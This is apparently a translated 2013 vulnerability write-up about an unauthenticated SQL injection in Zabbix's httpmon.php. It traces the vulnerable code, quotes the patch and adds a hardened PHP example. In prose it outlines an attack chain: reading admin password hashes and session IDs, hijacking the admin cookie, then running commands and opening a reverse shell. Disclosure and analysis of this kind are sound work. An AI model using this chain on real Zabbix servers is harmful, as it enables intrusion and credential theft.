Sleepy Dragon · 2013/10/17 12:55

From: www.corelan.be/index.php/2…

0x00 Background


The vulnerability was submitted on September 11, 2013, confirmed on September 23, and patched on October 2.

With this new 0day, an attacker can get into the Zabbix backend directly through SQL injection and then execute system commands.

A Metasploit exploit module is available for this vulnerability; companies running Zabbix should apply the patch promptly.

0x01 Exploitation details


The vulnerability exists in the httpmon.php script and is reachable by users who are not logged in.

This is because Zabbix has pre-configured a guest user. Users who are not logged in are assigned the access rights of the guest user.

If the guest user is disabled, the httpmon.php script cannot be accessed to exploit this vulnerability.

The guest user can be disabled from the administration panel.

As the figure below shows, the applications parameter is injectable.

View the source code:

```php
foreach ($_REQUEST['applications'] as $application) {
    add2favorites('web.httpmon.applications', $application);
}
```

Following the $application variable into the add2favorites function:

```php
function add2favorites($favobj, $favid, $source = null) {
    $favorites = get_favorites($favobj);
    foreach ($favorites as $favorite) {
        if ($favorite['source'] == $source && $favorite['value'] == $favid) {
            return true;
        }
    }
    DBstart();
    $values = array(
        'profileid' => get_dbid('profiles', 'profileid'),
        'userid'    => CWebUser::$data['userid'],
        'idx'       => zbx_dbstr($favobj),
        'value_id'  => $favid,          // request-controlled value, not escaped
        'type'      => PROFILE_TYPE_ID
    );
    // ... (the rest of the function is not reproduced here)
```

Tracing the value_id entry of the $values array further down shows that the variable reaches the SQL statement without any filtering:

```php
return DBend(DBexecute('INSERT INTO profiles ('.implode(', ', array_keys($values)).') VALUES ('.implode(', ', $values).')'));
```

The latest Zabbix patch:

#! php Index: frontends/php/include/profiles.inc.php =================================================================== --- frontends/php/include/profiles.inc.php (revision 38884) +++ frontends/php/include/profiles.inc.php (working copy) @@ -148,9 +148,9 @@ 'profileid' => get_dbid('profiles', 'profileid'), 'userid' => self::$userid ['userid'], 'idx' => zbx_dbstr($idx), - $value_type => ($value_type == 'value_str') ? zbx_dbstr($value) : $value, - 'type' => $type, - 'idx2' => $idx2 + $value_type => zbx_dbstr($value), + 'type' => zbx_dbstr($type), + 'idx2' => zbx_dbstr($idx2) ); return DBexecute('INSERT INTO profiles ('.implode(', ', array_keys($values)).') VALUES ('.implode(', ', $values).')'); // string value prepearing if (isset($DB['TYPE']) && $DB['TYPE'] == ZBX_DB_MYSQL) { function zbx_dbstr($var) { if (is_array($var)) { foreach ($var as $vnum => $value) { $var[$vnum] = "'".mysql_real_escape_string($value)."'"; } return $var; } return "'".mysql_real_escape_string($var)."'"; }Copy the code
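Review bot: the escaping in this hunk covers the values but not the column name: `$value_type => zbx_dbstr($value)` still places `$value_type` into the INSERT's column list unquoted via `implode(', ', array_keys($values))`, so the fix holds only while every caller passes one of the fixed profile value column names; an explicit allow-list check on `$value_type` before `$values` is built would make that guarantee local to this function. Also note that `type` and `idx2`, previously emitted as bare values, are now wrapped by `zbx_dbstr()` and thus become quoted literals, so their columns must accept that on every supported database, not only the MySQL branch shown in the `zbx_dbstr()` listing.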

Every value is now passed through zbx_dbstr(), which wraps it in quotes and escapes it with mysql_real_escape_string().
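To make the defect concrete, here is the vulnerable INSERT shape from add2favorites() beside a hardened form, as an added example that is neither Zabbix code nor the patch above. It runs stand-alone against an in-memory SQLite database; the table layout, function names and the two input values are constructed for this example.

```php
<?php
// Added example, not Zabbix code: the unescaped INSERT shape from add2favorites()
// beside a hardened version. An in-memory SQLite database stands in for MySQL so
// the script runs stand-alone; table and function names are this example's own.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE profiles (profileid INTEGER PRIMARY KEY, userid INTEGER,
           idx TEXT, value_id INTEGER, type INTEGER)');

// Vulnerable shape: only idx is quoted, value_id is the raw request value,
// so whatever the client sends becomes part of the SQL text itself.
function buildInsertVulnerable(int $userid, string $idx, string $favid): string
{
    $values = array(
        'userid'   => $userid,
        'idx'      => "'" . str_replace("'", "''", $idx) . "'", // stands in for zbx_dbstr()
        'value_id' => $favid,                                   // unescaped, as on the page
        'type'     => 1,
    );
    return 'INSERT INTO profiles (' . implode(', ', array_keys($values)) . ')'
         . ' VALUES (' . implode(', ', $values) . ')';
}

// Hardened shape: value_id is an id, so reject anything that is not an integer,
// then bind every value as a parameter instead of concatenating it.
function insertFavoriteSafe(PDO $db, int $userid, string $idx, string $favid): bool
{
    if (filter_var($favid, FILTER_VALIDATE_INT) === false) {
        return false;
    }
    $stmt = $db->prepare(
        'INSERT INTO profiles (userid, idx, value_id, type) VALUES (:userid, :idx, :value_id, 1)'
    );
    return $stmt->execute(array(
        ':userid'   => $userid,
        ':idx'      => $idx,
        ':value_id' => (int) $favid,
    ));
}

// Constructed inputs: a normal id and a non-numeric string of the kind the
// applications[] parameter accepts without any check.
$idx = 'web.httpmon.applications';
foreach (array('2', '2abc') as $favid) {
    // The vulnerable query text changes shape with the input; the safe path does not.
    echo buildInsertVulnerable(1, $idx, $favid), PHP_EOL;
    echo 'safe insert of "' . $favid . '": '
       . var_export(insertFavoriteSafe($db, 1, $idx, $favid), true), PHP_EOL;
}
```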

With this vulnerability, an error-based injection through the applications parameter can read the administrator's username and MD5 password hash from the users table:


But what if the administrator's password is complex enough that the MD5 hash cannot be cracked back to the plaintext?

It turns out that Zabbix also stores session values in its database, and none of them seem to be invalidated unless the user clicks to log out.

The following figure shows what the sessions table holds in the database:

So instead, extract the administrator's session ID from the sessions table through the same injection and log in with it directly, with no need to crack the MD5 hash.


Replace the value of the zbx_sessionID cookie with the obtained session ID:

Login then succeeds:

For executing commands once logged in as administrator, refer to this WooYun report:

WooYun: Sohu's Zabbix, which can lead to intranet penetration

It can also spawn a reverse shell directly for command execution, which is very convenient. For the specific techniques, refer to:

Ten ways to get a reverse shell